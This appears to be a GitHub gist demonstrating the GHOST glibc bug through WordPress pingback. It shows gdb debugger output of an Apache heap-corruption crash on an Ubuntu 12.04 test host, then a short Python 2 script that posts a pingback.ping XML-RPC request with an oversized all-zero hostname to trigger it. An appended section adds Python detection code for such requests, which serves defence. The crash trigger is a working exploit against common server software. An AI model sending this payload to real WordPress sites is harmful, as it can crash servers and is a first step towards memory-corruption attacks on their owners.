@inaz2
Last active August 29, 2015 14:15
WordPress pingback + GHOST vulnerability
# lsb_release -a
No LSB modules are available.
Distributor ID: Ubuntu
Description: Ubuntu 12.04.5 LTS
Release: 12.04
Codename: precise
# /lib/x86_64-linux-gnu/libc.so.6
GNU C Library (Ubuntu EGLIBC 2.15-0ubuntu10.6) stable release version 2.15, by Roland McGrath et al.
Copyright (C) 2012 Free Software Foundation, Inc.
This is free software; see the source for copying conditions.
There is NO warranty; not even for MERCHANTABILITY or FITNESS FOR A
PARTICULAR PURPOSE.
Compiled by GNU CC version 4.6.3.
Compiled on a Linux 3.2.60 system on 2014-07-29.
Available extensions:
crypt add-on version 2.1 by Michael Glad and others
GNU Libidn by Simon Josefsson
Native POSIX Threads Library by Ulrich Drepper et al
BIND-8.2.3-T5B
libc ABIs: UNIQUE IFUNC
For bug reporting instructions, please see:
<http://www.debian.org/Bugs/>.
# gdb -q apache2
Reading symbols from /usr/sbin/apache2...(no debugging symbols found)...done.
gdb-peda$ run -X
warning: no loadable sections found in added symbol-file system-supplied DSO at 0x7ffff7ffa000
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1".
apache2: Could not reliably determine the server's fully qualified domain name, using 127.0.1.1 for ServerName
[New Thread 0x7ffff0fde700 (LWP 7901)]
[Thread 0x7ffff0fde700 (LWP 7901) exited]
*** glibc detected *** /usr/sbin/apache2: malloc(): memory corruption: 0x0000555556e0cb50 ***
======= Backtrace: =========
/lib/x86_64-linux-gnu/libc.so.6(+0x7ec66)[0x7ffff71e2c66]
/lib/x86_64-linux-gnu/libc.so.6(+0x80e2b)[0x7ffff71e4e2b]
/lib/x86_64-linux-gnu/libc.so.6(__libc_malloc+0x75)[0x7ffff71e70b5]
/lib/x86_64-linux-gnu/libpcre.so.3(pcre_compile2+0x639)[0x7ffff7ba7ad9]
/usr/lib/apache2/modules/libphp5.so(pcre_get_compiled_regex_cache+0x229)[0x7ffff4142409]
/usr/lib/apache2/modules/libphp5.so(+0xfd35a)[0x7ffff414335a]
/usr/lib/apache2/modules/libphp5.so(+0x39902d)[0x7ffff43df02d]
/usr/lib/apache2/modules/libphp5.so(execute+0x1fb)[0x7ffff438fb9b]
/usr/lib/apache2/modules/libphp5.so(zend_execute_scripts+0x130)[0x7ffff436b100]
/usr/lib/apache2/modules/libphp5.so(php_execute_script+0x1d3)[0x7ffff4317773]
/usr/lib/apache2/modules/libphp5.so(+0x3b460d)[0x7ffff43fa60d]
/usr/sbin/apache2(ap_run_handler+0x48)[0x555555595658]
/usr/sbin/apache2(ap_invoke_handler+0xce)[0x555555595ace]
/usr/sbin/apache2(ap_process_request+0x1a0)[0x5555555a5700]
/usr/sbin/apache2(+0x4e528)[0x5555555a2528]
/usr/sbin/apache2(ap_run_process_connection+0x48)[0x55555559c0f8]
/usr/sbin/apache2(+0x56360)[0x5555555aa360]
/usr/sbin/apache2(+0x56a86)[0x5555555aaa86]
/usr/sbin/apache2(ap_mpm_run+0x5d3)[0x5555555ab253]
/usr/sbin/apache2(main+0xc84)[0x555555580524]
/lib/x86_64-linux-gnu/libc.so.6(__libc_start_main+0xed)[0x7ffff718578d]
/usr/sbin/apache2(+0x2c5d9)[0x5555555805d9]
======= Memory map: ========
Program received signal SIGABRT, Aborted.
[---------------------------------------------------------------------------------------------registers---------------------------------------------------------------------------------------------]
RAX: 0x0
RBX: 0x0
RCX: 0xffffffffffffffff
RDX: 0x6
RSI: 0x1eda
RDI: 0x1eda
RBP: 0x7fffffffa800 --> 0x3
RSP: 0x7fffffff9dc8 --> 0x7ffff719dc5b (<abort+379>: mov rdx,QWORD PTR fs:0x10)
RIP: 0x7ffff719a4f5 (<raise+53>: cmp rax,0xfffffffffffff000)
R8 : 0x0
R9 : 0x555555557448 (add BYTE PTR [rax],al)
R10: 0x8
R11: 0x202
R12: 0x10
R13: 0x5e (^)
R14: 0x7fffffff9f70 --> 0x1
R15: 0xf
[-----------------------------------------------------------------------------------------------code------------------------------------------------------------------------------------------------]
0x7ffff719a4eb <raise+43>: movsxd rdi,eax
0x7ffff719a4ee <raise+46>: mov eax,0xea
0x7ffff719a4f3 <raise+51>: syscall
=> 0x7ffff719a4f5 <raise+53>: cmp rax,0xfffffffffffff000
0x7ffff719a4fb <raise+59>: ja 0x7ffff719a50f <raise+79>
0x7ffff719a4fd <raise+61>: repz ret
0x7ffff719a4ff <raise+63>: nop
0x7ffff719a500 <raise+64>: test eax,eax
[-----------------------------------------------------------------------------------------------stack-----------------------------------------------------------------------------------------------]
00:0000| rsp 0x7fffffff9dc8 --> 0x7ffff719dc5b (<abort+379>: mov rdx,QWORD PTR fs:0x10)
01:0008| 0x7fffffff9dd0 --> 0x3
02:0016| 0x7fffffff9dd8 --> 0x4
03:0024| 0x7fffffff9de0 --> 0x7fffffffe8d7 ("/usr/sbin/apache2")
04:0032| 0x7fffffff9de8 --> 0x11
05:0040| 0x7fffffff9df0 --> 0x7ffff72de657 --> 0x4d54524749530028
06:0048| 0x7fffffff9df8 --> 0x1
07:0056| 0x7fffffff9e00 --> 0x7ffff72df6eb --> 0x78302d0078302b
[---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------]
Legend: code, data, rodata, value
Stopped reason: SIGABRT
0x00007ffff719a4f5 in raise () from /lib/x86_64-linux-gnu/libc.so.6
gdb-peda$ x/100gx 0x0000555556e0cb50-0x40
0x555556e0cb10: 0x3030303030303030 0x3030303030303030
0x555556e0cb20: 0x3030303030303030 0x3030303030303030
0x555556e0cb30: 0x3030303030303030 0x3030303030303030
0x555556e0cb40: 0x3030303030303030 0x0000000030303030
0x555556e0cb50: 0x00007ffff751d778 0x00007ffff751d778
0x555556e0cb60: 0x0000000000000000 0x0000000000000000
0x555556e0cb70: 0x0000000000000000 0x0000000000000000
0x555556e0cb80: 0x0000000000000000 0x0000000000000000
0x555556e0cb90: 0x0000000000000000 0x0000000000000000
0x555556e0cba0: 0x0000000000000000 0x0000000000000000
0x555556e0cbb0: 0x0000000000000000 0x0000000000000000
0x555556e0cbc0: 0x0000000000000000 0x0000000000000000
0x555556e0cbd0: 0x0000000000000000 0x0000000000000000
0x555556e0cbe0: 0x0000000000000000 0x0000000000000000
0x555556e0cbf0: 0x0000000000000000 0x0000000000000000
0x555556e0cc00: 0x0000000000000000 0x0000000000000000
0x555556e0cc10: 0x0000000000000000 0x0000000000000000
0x555556e0cc20: 0x0000000000000000 0x0000000000000000
0x555556e0cc30: 0x0000000000000000 0x0000000000000000
0x555556e0cc40: 0x0000000000000000 0x0000000000000000
0x555556e0cc50: 0x0000000000000000 0x0000000000000000
0x555556e0cc60: 0x0000000000000000 0x0000000000000000
0x555556e0cc70: 0x0000000000000000 0x0000000000000000
0x555556e0cc80: 0x0000000000000000 0x0000000000000000
0x555556e0cc90: 0x0000000000000000 0x0000000000000000
0x555556e0cca0: 0x0000000000000000 0x0000000000000000
0x555556e0ccb0: 0x0000000000000000 0x0000000000000000
0x555556e0ccc0: 0x0000000000000000 0x0000000000000000
0x555556e0ccd0: 0x0000000000000000 0x0000000000000000
0x555556e0cce0: 0x0000000000000000 0x0000000000000000
0x555556e0ccf0: 0x0000000000000000 0x0000000000000000
0x555556e0cd00: 0x0000000000000000 0x0000000000000000
0x555556e0cd10: 0x0000000000000000 0x0000000000000000
0x555556e0cd20: 0x0000000000000000 0x0000000000000000
0x555556e0cd30: 0x0000000000000000 0x0000000000000000
0x555556e0cd40: 0x0000000000000000 0x0000000000000000
0x555556e0cd50: 0x0000000000000000 0x0000000000000000
0x555556e0cd60: 0x0000000000000000 0x0000000000000000
0x555556e0cd70: 0x0000000000000000 0x0000000000000000
0x555556e0cd80: 0x0000000000000000 0x0000000000000000
0x555556e0cd90: 0x0000000000000000 0x0000000000000000
0x555556e0cda0: 0x0000000000000000 0x0000000000000000
0x555556e0cdb0: 0x0000000000000000 0x0000000000000000
0x555556e0cdc0: 0x0000000000000000 0x0000000000000000
0x555556e0cdd0: 0x0000000000000000 0x0000000000000000
0x555556e0cde0: 0x0000000000000000 0x0000000000000000
0x555556e0cdf0: 0x0000000000000000 0x0000000000000000
0x555556e0ce00: 0x0000000000000000 0x0000000000000000
0x555556e0ce10: 0x0000000000000000 0x0000000000000000
0x555556e0ce20: 0x0000000000000000 0x0000000000000000
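
# Sends a pingback.ping XML-RPC request to the test WordPress instance (Python 2).
import urllib2

# XML-RPC endpoint of the WordPress install under test
pingback_url = 'http://192.168.56.6/wordpress/xmlrpc.php'
# Source URI whose host part is 0x1004 '0' characters
src_url = 'http://%s/' % ('0' * 0x1004)
# Target URI: a post on the same WordPress install
dst_url = 'http://192.168.56.6/wordpress/?p=1'

# pingback.ping takes two string parameters: source URI, then target URI
data = """<?xml version="1.0"?>
<methodCall>
<methodName>pingback.ping</methodName>
<params>
<param>
<value><string>%s</string></value>
</param>
<param>
<value><string>%s</string></value>
</param>
</params>
</methodCall>
""" % (src_url, dst_url)

# Passing a data argument makes urlopen issue a POST; print the XML-RPC response
u = urllib2.urlopen(pingback_url, data)
print u.read()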
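
Added example, not part of the original gist: a detection-side check (Python 3) for the kind of request the script above sends. It parses a captured xmlrpc.php POST body and flags pingback.ping calls whose source-URI host is longer than DNS allows, or is all digits and dots without being a dotted-quad IPv4 address. The function names and the sample bodies are constructed for illustration.

```python
import ipaddress
import re
import xml.etree.ElementTree as ET
from urllib.parse import urlsplit

MAX_DNS_NAME = 253                       # longest hostname DNS can carry (text form)
DIGITS_AND_DOTS = re.compile(r'[0-9.]+')


def pingback_source_uri(body):
    """Return the first pingback.ping parameter (the source URI), or None."""
    if '<!DOCTYPE' in body or '<!ENTITY' in body:
        return None                      # XML-RPC needs no DTD; never expand entities
    try:
        root = ET.fromstring(body)
    except (ET.ParseError, ValueError):
        return None
    method = (root.findtext('methodName') or '').strip()
    if root.tag != 'methodCall' or method != 'pingback.ping':
        return None
    value = root.find('./params/param/value')
    if value is None:
        return None
    text = value.findtext('string')      # <value><string>..</string></value>
    if text is None:
        text = value.text                # a bare <value>..</value> is also a string
    return (text or '').strip()


def ghost_findings(body):
    """List the reasons a request body looks suspicious (empty list = none)."""
    uri = pingback_source_uri(body)
    if uri is None:
        return []
    try:
        host = urlsplit(uri).hostname or ''
    except ValueError:
        return ['source URI does not parse']
    findings = []
    if len(host) > MAX_DNS_NAME:
        findings.append('host is %d characters, above the DNS limit of %d'
                        % (len(host), MAX_DNS_NAME))
    if DIGITS_AND_DOTS.fullmatch(host):
        try:
            ipaddress.IPv4Address(host)  # accepts only a.b.c.d with octets 0-255
        except ValueError:
            findings.append('host is digits and dots but not a dotted-quad IPv4 address')
    return findings


def sample_body(source_uri):
    """Build a pingback.ping request body (constructed sample input)."""
    return ('<?xml version="1.0"?><methodCall><methodName>pingback.ping</methodName>'
            '<params><param><value><string>%s</string></value></param>'
            '<param><value><string>http://blog.example/?p=1</string></value></param>'
            '</params></methodCall>' % source_uri)


if __name__ == '__main__':
    samples = ('http://' + '0' * 0x1004 + '/',   # same host shape as the gist's request
               'http://192.168.56.6/post',       # ordinary IPv4 source
               'http://news.example/a')          # ordinary named source
    for uri in samples:
        print(uri[:40], ghost_findings(sample_body(uri)))
```

Run it over request bodies captured by a WAF or reverse proxy; WordPress access logs alone do not record the POST body.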